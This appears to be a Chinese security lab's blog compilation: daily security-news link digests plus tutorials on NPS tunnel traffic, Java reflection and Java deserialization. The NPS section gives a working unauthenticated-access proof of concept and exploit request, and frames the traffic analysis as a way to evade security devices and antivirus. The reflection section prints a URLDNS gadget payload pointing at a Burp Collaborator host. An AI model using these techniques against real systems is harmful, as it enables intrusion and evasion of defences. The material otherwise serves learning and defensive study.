免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、摩根士丹利因泄露数百万客户信息被罚款 3500 万美元 https://www.securityweek.com/morgan-stanley-pay-35m-fine-exposing-information-millions-customers 2、Dataprobe的iBoot 配电单元 (PDU) 中发现严重漏洞可被远程关闭设备 https://www.securityweek.com/iboot-power-distribution-unit-flaws-allow-hackers-remotely-shut-down-devices 3、超过 39,000 个未授权访问的 Redis 实例暴露在互联网上 https://thehackernews.com/2022/09/over-39000-unauthenticated-redis.html 4、美国FCC 将中国联通 (美洲) 运营有限公司列入国家安全威胁名单 https://thehackernews.com/2022/09/us-adds-2-more-chinese-telecom-firms-to.html 5、新的 BiTB 网络钓鱼攻击窃取 Steam 帐户 https://cyware.com/news/new-bitb-phishing-attacks-steal-steam-accounts-500d83f7 6、Hive勒索软件团伙攻击了纽约赛车协会 https://www.bleepingcomputer.com/news/security/hive-ransomware-claims-attack-on-new-york-racing-association/ 7、黑客入侵2K Games公司并向玩家推送恶意软件 https://www.bleepingcomputer.com/news/security/2k-games-says-hacked-help-desk-targeted-players-with-malware/ 8、黑客论坛出售Ask.fm和ask.com的3.5亿条用户数据 https://www.databreaches.net/ask-fm-user-database-with-350m-user-records-has-shown-up-for-sale/ 9、信阳师范学院曝"学信网信息泄露"，原因是参加问卷调查填写了学信码 https://www.freebuf.com/news/345201.html 10、针对企事业单位和高校的StrivePhish钓鱼组织大爆发，至少千人已中招 https://x.threatbook.com/v5/article?threatInfoID=36821

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、纽约救护车服务Empress EMS遭勒索软件攻击超32W个人信息遭破坏 https://www.securityweek.com/new-york-emergency-services-provider-says-patient-data-stolen-ransomware-attack 2、Sandworm APT 冒充乌克兰电信公司传播恶意软件 https://securityaffairs.co/wordpress/135996/apt/sandworm-targets-ukraine-teleco.html 3、Uber称 LAPSUS$ 团伙是最近攻击Uber的幕后黑手 https://securityaffairs.co/wordpress/135980/cyber-crime/uber-hacked-by-lapsus-group.html 4、美国航空披露数据泄露事件，客户个人数据遭泄露 https://www.securityweek.com/american-airlines-says-personal-data-exposed-after-email-phishing-attack 5、加密货币做市商Wintermute遭DeFi黑客攻击，损失1.6亿美元 https://techcrunch.com/2022/09/20/crypto-market-maker-wintermute-loses-160-million-in-defi-hack 6、研究人员警告近期传播Chromeloader的攻击活动 https://securityaffairs.co/wordpress/135949/malware/chromeloader-malware-campaigns.html 7、美驻华使领馆过度采集中方雇员信息，数据或供给美国情报部门 https://baijiahao.baidu.com/s?id=1744324065971273526 8、调查：三分之一的企业未加密云端敏感数据 https://www.secrss.com/articles/47024 9、Emotet 僵尸网络正传播 Quantum 和 BlackCat 勒索软件 https://www.bleepingcomputer.com/news/security/emotet-botnet-now-pushes-quantum-and-blackcat-ransomware/ 10、Edge、Chrome的拼写检查功能会将用户输入信息上传他们的服务器 https://www.cnbeta.com/articles/tech/1317905.htm

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、游戏发行商 Rockstar Games 确认遭受网络攻击，GTA6源码被盗 https://www.securityweek.com/rockstar-games-confirms-breach-leading-gta-6-leak 2、金融科技公司 Revolut遭高度针对性网络攻击，超5W客户数据泄露 https://securityaffairs.co/wordpress/135935/data-breach/revolut-data-breach.html 3、为飞机提供WiFi的Flexlan设备存在严重漏洞可用于发起恶意攻击 https://securityaffairs.co/wordpress/135898/security/flexlan-critical-flaws.html 4、优步确认黑客访问了其内部工具 https://www.securityweek.com/uber-confirms-hacker-accessed-bug-bounty-dashboard-internal-tools 5、微软警告针对游戏玩家的大规模点击欺诈活动 https://thehackernews.com/2022/09/microsoft-warns-of-large-scale-click.html 6、Lockbit勒索软件团伙支付5万美元的"漏洞赏金" https://www.govinfosecurity.com/ransomware-as-a-service-gang-lockbit-pays-first-50k-bounty-a-20099 7、安全研究员曝光特斯拉使用"特殊代码"作弊在碰撞测试中获得好成绩 https://www.freebuf.com/news/344842.html 8、美国司法部成立专门机构打击加密货币犯罪 https://www.solidot.org/story?sid=72792 9、星巴克新加坡公司遭数据泄露，22万名顾客数据被出售 https://www.freebuf.com/news/344836.html 10、洲际酒店(IHG)遭遇黑客破坏性攻击，目的竟是“为了好玩” https://www.cnbeta.com/articles/tech/1317511.htm

前言 因为想要写一个socks的流量算法去绕过安全设备，所以这里对nps的流量特征总结一下，方便自己后期的魔改。 环境 ubuntu 16.04 vps server windows server 2012R2 clinet mkdir nps cd nps wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz tar -zxvf linux_amd64_server.tar.gz ./nps install cd /etc/nps/conf/ vim nps.conf 配置文件 #web web_host=a.o.com web_username=xxxx   //管理端用户名 web_password=xxxxxx //管理端密码 web_port = xxxxx     //管理端端口 web_ip=0.0.0.0 web_base_url= web_open_ssl=false web_cert_file=conf/server.pem web_key_file=conf/server.key #web_base_url=/nps ##bridge bridge_type=tcp   //客户端连接协议tcp bridge_port=xxxx //客户端连接端口 bridge_ip=0.0.0.0 bridge_port的默认端口默认为8024，这里不建议改为默认的，连接客户端的时候可能会触发安全设备规则 NPS未授权复现 POC #encoding=utf-8 import time import hashlib now = time.time() m = hashlib.md5() m.update(str(int(now)).encode("utf8")) auth_key = m.hexdigest() print("Index/Index?auth_key=%s&timestamp=%s" % (auth_key,int(now)) 直接访问 http://vps:port?payload exp请求接口 POST /client/list HTTP/1.1 Host: vps:port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 98 Origin: http://vps:port Connection: close Referer: http://vps:port/client/list search=&order=asc&offset=0&limit=10&auth_key=805df7d1f7bf3b662939ca091174e6b4&timestamp=1659948547 参考链接： https://mp.weixin.qq.com/s/PTq01wcV4XJwutbSjHjfvA修复措施 vim /etc/nps/conf/nps.conf取消注释auth_key,添加auth_crypt_key`注释 auth_key=test#auth_crypt_key =!QAZ4rfv%TGB^YHN 修改为 auth_key=test#auth_crypt_key =!QAZ4rfv%TGB^YHN 目前最新版本的也存在改配置不当问题，这里需要修改配置，修复之后是无法通过未授权读取内容信息的。 socks流量分析 nps start 访问http://vps:port/login 新增客户端 这里用户名和密码随意，这里是客户端登录的认证用户名，在客户端连接的时候是根据密钥来实现的。 客户端选择windwos server 2012R2 修改客户端配置文件 [common] server_addr=vps:port conn_type=tcp vkey=xxxx auto_reconnection=true max_conn=1000 flow_limit=1000 rate_limit=1000 basic_username=11 basic_password=3 web_username=xxxx     web_password=xxxxx crypt=true compress=true #pprof_addr=0.0.0.0:9999 disconnect_timeout=60 客户端启动 npc.exe -server=vps:port -vkey=xxxxx -type=tcp 正常情况下会报毒，所以这里针对杀软这一块儿，客户端需要做一下免杀处理。 查看连接状态 使用goby测试socks5 测试代理 已成功实现内网穿透。 这里使用wireshark抓取流量包， 初始流量服务器向客户端发送TST 同时客户端向服务端确认版本，同时返回客户端版本0.26.0 代码位置nps/lib/version/version.go 服务端接收到请求后，客户端请求的数据内容为nps的版本为0.26.10 服务端接收到请求后返回给客户端服务端版本的md5值，即 md5(0.26.0)=89a4f3fc3c89257d6f712de6964bda8e 可以发现在产生nps客户端连接的时候,会产生数据校验，这里数据校验就是有服务器到 这是客户端传输给服务端密钥连接 md5(vkey) 服务端在接收到客户端的请求后校验数据后返回success 这里客户端和服务端的连接流量就比较清晰了，那么想要bypass安全设备的告警，在修改加密方式和修改版本关键字即可，因为在做流量隐藏的时候跟bypassav不一样，不会考虑文件的哈希以及文件在沙箱中的落地状态。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、FunJSQ 游戏加速模块漏洞影响多个Netgear 路由器 https://securityaffairs.co/wordpress/135887/security/netgear-game-acceleration-module-flaw.html 2、Bitdefender 发布LockerGoga 勒索软件解密器 https://securityaffairs.co/wordpress/135843/malware/lockergoga-ransomware-decryptor.html 3、UNC4034 APT 通过 WhatsApp 传播带后门的 PuTTY https://securityaffairs.co/wordpress/135831/malware/north-korea-linked-apt-backdoored-putty.html 4、Uber被黑，内部系统和机密文件据称遭到破坏 https://securityaffairs.co/wordpress/135811/data-breach/uber-hacked-systems-allegedly-compromised.html 5、信安标委发布《信息安全技术 网络数据分类分级要求》（征求意见稿） https://www.freebuf.com/news/344672.html 6、CISA 命令机构修补 Stuxnet 攻击中使用的漏洞 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-vulnerability-used-in-stuxnet-attacks/ 7、美国参议员透露海关如何从美国人的设备中收集数据 https://www.zdnet.com/article/us-senator-reveals-how-us-customs-has-amassed-data-from-americans-devices/ 8、LastPass对8月遭网络攻击事件调查后未发现客户数据泄露 https://www.bleepingcomputer.com/news/security/lastpass-says-hackers-had-internal-access-for-four-days/ 9、研究人员发现利用Microsoft Edge新闻源的恶意广告活动 https://www.bleepingcomputer.com/news/security/microsoft-edge-s-news-feed-ads-abused-for-tech-support-scams/ 10、攻击者利用Emotet僵尸网络传播Quantum和BlackCat勒索软件 https://www.bleepingcomputer.com/news/security/emotet-botnet-now-pushes-quantum-and-blackcat-ransomware/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、研究人员发现针对希腊银行用户的网络钓鱼活动 https://blog.cyble.com/2022/09/14/phishing-campaign-targets-greek-banking-users/ 2、黑客入侵PVC制造商Eurocell导致员工数据泄露 https://www.cysecurity.news/2022/09/attackers-compromise-employee-data-at.html 3、CISA敦促各组织修复被积极利用的Windows、iOS漏洞 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-windows-ios-bugs-used-in-attacks/ 4、网信办就《关于修改〈中华人民共和国网络安全法〉的决定（征求意见稿）》公开征求意见 http://www.cac.gov.cn/2022-09/14/c_1664781649609823.htm 5、Google 和 Meta 因非法收集个人信息被韩国罚款千亿韩元 https://www.solidot.org/story?sid=72762 6、安全研究人员警告称，一技术缺陷能让黑客成功盗窃特斯拉汽车 https://www.inforisktoday.com/tesla-hack-could-allow-car-theft-security-researchers-warn-a-20049 7、荷兰警方逮捕一名洗钱数千万被盗加密货币的男子 https://www.bleepingcomputer.com/news/security/police-arrest-man-for-laundering-tens-of-millions-in-stolen-crypto/ 8、英国女王去世消息被用在网络钓鱼活动中 https://www.bleepingcomputer.com/news/security/death-of-queen-elizabeth-ii-exploited-to-steal-microsoft-credentials/ 9、Coalition 2022 年报告显示中小型企业受勒索软件的影响最大 https://www.helpnetsecurity.com/2022/09/15/small-businesses-ransomware-targets/ 10、Rust 基金会成立专门的安全团队以改善Rust语言安全性 https://www.securityweek.com/rust-gets-dedicated-security-team

反射是大多数语言里都必不不可少的组成部分，对象可以通过反射获取他的类，类可以通过反射拿到所有方法（包括私有），拿到的方法可以调用，总之通过“反射”，我们可以将Java这种静态语言附加上动态特性。 什么是反射 java的反射是指在运行状态中，对于任意一个类都能够知道这个类所有的属性和方法，并且对于任意一个对象。 基本形式 public void execute(String className, String methodName) throws Exception { Class clazz = Class.forName(className); clazz.getMethod(methodName).invoke(clazz.newInstance()); } 上面的例子中，我演示了几个在反射里极为重要的方法：获取类的方法： forName实例例化类对象的方法： newInstance获取函数的方法： getMethod执行函数的方法： invoke 反射的作用： 让Java具有动态性，修改已有对象的属性，动态生成对象，动态调用方法，操作内部类和私有方法 在反序列化漏洞中的应用 定制需要的对象，通过invoke调用除了同名函数以外的函数，通过class类创建对象，引入不能序列化的类 java反射举例 此处引用白日梦组长的例子，具体讲解一下反射。 先写一个Person作为我们下面演示的原型类 public class Person {   private String name;   public int age;   public void act(){       System.out.println("test");   }   @Override   public String toString() {       return "Persion{" +               "name='" + name + '\'' +               ", age=" + age +               '}';   }   public String getName() {       return name;   }   public void setName(String name) {       this.name = name;   }   public int getAge() {       return age;   }   public void setAge(int age) {       this.age = age;   }   public Person() {   }   public Person(String name, int age) {       this.name = name;       this.age = age;   } } 获取原型类 使用forName方法 Class c = Class.forName("Person"); 在此也写一种基于ClassLoader的动态类加载方式 this.getClass().getClassLoader().loadClass("Person"); 从原型class里面实例化对象 利用构造函数实例化 Constructor constructor = c.getConstructor(String.class,int.class); Person p1 = (Person) constructor.newInstance("abc",22); 我们来逐行写一下分析 Constructor constructor = c.getConstructor(String.class,int.class); 这一行是为了获取原型类中重载的构造方法 public Person(String name, int age) { this.name = name; this.age = age; } 对构造方法进行传参实例化一个对象 Person p1 = (Person) constructor.newInstance("abc",22); 我们可以打印一下p1看一下返回结果 获取类里面的属性 private String name; public int age; public Field ageField = c.getField("age"); ageField.set(p1,11); private Field nameField = c.getDeclaredField("name"); nameField.setAccessible(true); nameField.set(p1,"xinyuan"); 获取类方法 Method actmethod = c.getMethod("act",String.class); actmethod.invoke(p1,"SKyMirror"); getMethod 与上面的获取构造函数类似，第一个参数是函数名，第二个是传参的类型 invoke方法第一个传入对象，第二个是传入参数值 利用URLDNS（反射） 这条链子算是反射的一个简单应用。 利用点 URL这个类重写了hashCode方法，导致在执行hashCode的时候，此利用点不能命令执行，但是会请求DNS，所以被用来验证是否存在反序列化漏洞。 源码如下： 可以看到当我们调用一次hashCode方法，他会对传进去的URL对象发起请求，即我们如果去DNSLOG申请一个地址，根据访问来判断是否成功执行了hashCode方法进而判断是否执行了反序列化的操作。 URL这个类实现了java.io.Serializable，可以进行序列化的操作。 因此，在这里我们可以验证一下我们上面的想法。 链子 这个链子也比较短，比较简单，主要是利用HashMap来执行hashCode方法 HashMap实现了Serializable可以序列化，此处注意反序列化时HashMap的readObject方法 我们跟进一下hash方法 key参数可控，key又是由反序列化的时候生成的。在HashMap中用put传入一个URL的对象，即可在反序列化的时候调用到此方法，从而触发整个链子。 有一点需要注意，我们在序列化的时候，进行的put传参会修改掉传入的URL对象的hashCode的值，因为hashCode值不等于-1，从而导致无法正常触发下面的方法，即无法触发DNS请求。 同时在正常put传参的时候会执行一次DNS请求，所以我们在put传参之前修改hashCode的值（不为-1就行），传参之后修改hashCode为-1，在反序列化的时候就可以正常执行了。 payload如下 public static void main(String[] args) throws Exception{ HashMap <URL,Integer> hashMap = new HashMap<>(); URL u = new URL("http://i2loelbsvarbmabqf89qi9k88zep2e.burpcollaborator.net/"); Class c = u.getClass(); //在进行put方法传参之前修改URL对象的hashCode值 Field hashcodeField = c.getDeclaredField("hashCode"); hashcodeField.setAccessible(true); hashcodeField.set(u,123); hashMap.put(u,123); //修改URL对象的hashCode值为-1 hashcodeField.set(u,-1); serialize(hashMap); }

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、TA453黑客组织使用"多角色模拟"技术进行网络钓鱼活动 https://www.proofpoint.com/us/blog/threat-insight/ta453-uses-multi-persona-impersonation-capitalize-fomo 2、美国德克萨斯州医疗中心OakBend遭到勒索软件攻击 https://www.databreaches.net/oakbend-medical-center-hit-by-ransomware-daixin-team-claims-responsibility/ 3、黑客利用伪造的登录窗口窃取Steam帐户 https://www.bleepingcomputer.com/news/security/hackers-steal-steam-accounts-in-new-browser-in-the-browser-attacks/ 4、WPGateway中的零日漏洞被积极利用 https://www.wordfence.com/blog/2022/09/psa-zero-day-vulnerability-in-wpgateway-actively-exploited-in-the-wild/ 5、Bishop Fox 发布开源云安全工具"CloudFox" https://www.securityweek.com/bishop-fox-releases-open-source-cloud-hacking-tool-cloudfox 6、SparklingGoblin APT使用 SideWalk 后门的新 Linux 变种 https://thehackernews.com/2022/09/sparklinggoblin-apt-hackers-using-new.html 7、阿根廷首都立法机关遭受破坏性勒索软件攻击 https://therecord.media/buenos-aires-legislature-announces-ransomware-attack/ 8、 思科证实阎罗王勒索软件组织窃取了企业数据 https://www.solidot.org/story?sid=72740 9、公安机关加强国际执法合作，深入推进打击治理电信网络诈骗犯罪 https://www.secrss.com/articles/46816 10、Twitter前安全负责人告诉国会该公司存在严重的安全漏洞 https://securityaffairs.co/wordpress/135726/security/twitter-head-security-concerns-senate.html

早就想学java安全，但一直无从下手，今天下定决心好好学习，当然以下内容可能会有些许错误，小白的烦恼。 序列化与反序列化 Java序列化是指把Java对象转换为字节序列的过程；而Java反序列化是指把字节序列恢复为Java对象的过程。 序列化分为两大部分：序列化和反序列化。序列化是这个过程的第一部分，将数据分解成字节流，以便存储在文件中或在网络上传输。反序列化就是打开字节流并重构对象。对象序列化不仅要将基本数据类型转换成字节表示，有时还要恢复数据。恢复数据要求有恢复数据的对象实例。 为什么需要序列化与反序列化 我们知道，当两个进程进行远程通信时，可以相互发送各种类型的数据，包括文本、图片、音频、视频等， 而这些数据都会以二进制序列的形式在网络上传送。那么当两个Java进程进行通信时，能否实现进程间的对象传送呢？答案是可以的。如何做到呢？这就需要Java序列化与反序列化了。换句话说，一方面，发送方需要把这个Java对象转换为字节序列，然后在网络上传送；另一方面，接收方需要从字节序列中恢复出Java对象。 当我们明晰了为什么需要Java序列化和反序列化后，我们很自然地会想Java序列化的好处。其好处一是实现了数据的持久化，通过序列化可以把数据永久地保存到硬盘上（通常存放在文件里），二是，利用序列化实现远程通信，即在网络上传送对象的字节序列。 ① 想把内存中的对象保存到一个文件中或者数据库中时候；② 想用套接字在网络上传送对象的时候；③ 想通过RMI传输对象的时候 为什么会产生安全问题？ 只要服务端反序列化数据，客户端传递类的readObject中代码会自动执行，给予攻击者在服务器上运行代码的能力。 几种常见的序列化和反序列化协议 XML&SOAP JSON Protobuf 理解 类比快递、打包和拆包 有些快递打包和拆包时有独特需求、比如易碎朝上，类比重写writeObject和readObject 实例 Java反序列化的操作，很多是需要开发者深入参与的，所以你会发现大量的库会实现readObject 、writeObject 方法，这和PHP中__wakeup 、__sleep 很少使用是存在鲜明对比的。我在《Java安全漫谈 - 06.RMI篇(3)》的最后一部分，讲到了classAnnotations ，这次再来说说objectAnnotation 。Java在序列化时一个对象，将会调用这个对象中的writeObject 方法，参数类型是ObjectOutputStream ，开发者可以将任何内容写入这个stream中；反序列化时，会调用readObject ，开发者也可以从中读取出前面 创建一个person类 import java.io.IOException; import java.io.ObjectInputStream; import java.io.Serializable; public class Person implements Serializable {    private String name;    private int age;    public Person(){}    public Person(String name,int age){        this.name=name;        this.age=age;   }    @Override    public String toString() {        return "Person{"+        "name='" + name + "\'" +                ",'age=" + age +                '}';   } } 创建一个序列化类 import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectOutputStream; public class SerializationTest {   public static void serialize(Object obj) throws IOException {       ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("ser.bin"));       oos.writeObject(obj);   }   public static void main(String[] args) throws Exception{       Person person=new Person("xinyuan",22);       serialize(person);       System.out.println(person);   } } 创建一个反序列化类 import java.io.FileInputStream; import java.io.IOException; import java.io.ObjectInputStream; public class UnserializationTest {   public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {       ObjectInputStream ois=new ObjectInputStream(new FileInputStream("ser.bin"));       Object obj = ois.readObject();       return obj;   }   public static void main(String[] args) throws Exception{       Person person=(Person) unserialize("ser.bin");       System.out.println(person);   } } 可能的形式 1.入口类的readObject直接调用危险方法 在person类，重写readObject方法，序列化后，反序列化 2.入口类参数中包含可控类，该类有危险方法，readObject时调用。 3.入口类参数包含可控类，该类又调用其他有危险方法的类，readObject时调用 条件 共同条件 继承Serializable 入口类 source（重写readObject 参数类型宽泛 最好jdk自带） Map<Object ,Object> 调用链 gadget chain 相同名称，相同类型 执行类 sink（rce ssrf 写文件等等） https://github.com/frohoff/ysoserial/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、黑客团体 GhostSec 入侵了以色列的 55 台 Berghof PLC https://securityaffairs.co/wordpress/135656/hacktivism/ghostsec-hacked-berghof-plcs-israel.html 2、趋势科技修复了被利用的 Apex One 零日漏洞 https://securityaffairs.co/wordpress/135689/security/trend-micro-apex-one-zero-day.html 3、Lorenz 勒索软件在攻击中利用 Mitel VoIP 设备漏洞 https://www.securityweek.com/lorenz-ransomware-gang-exploits-mitel-voip-appliance-vulnerability-attacks 4、iOS 16 推出无密码身份验证和间谍软件防护等安全功能 https://www.securityweek.com/ios-16-rolls-out-passwordless-authentication-spyware-protection 5、苹果发布iOS和macOS更新以修复被积极利用的零日漏洞 https://www.bleepingcomputer.com/news/security/apple-fixes-eighth-zero-day-used-to-hack-iphones-and-macs-this-year/ 6、研究人员发现Xalan-J存在任意代码执行漏洞 https://portswigger.net/daily-swig/vulnerability-in-xalan-j-could-allow-arbitrary-code-execution 7、加州监狱系统遭受黑客攻击可能导致数据泄露 https://www.govinfosecurity.com/california-prison-system-says-236000-affected-by-hack-a-20048 8、cURL曝长寿DOS漏洞：存在时间长达24年 https://www.secrss.com/articles/46795 9、北京消费者协会报告称超六成受访者曾被大数据“杀熟 https://www.cnbeta.com/articles/tech/1314349.htm 10、欧盟草案显示：智能冰箱、电视等设备需严格遵守网络安全规则 https://www.ithome.com/0/640/144.htm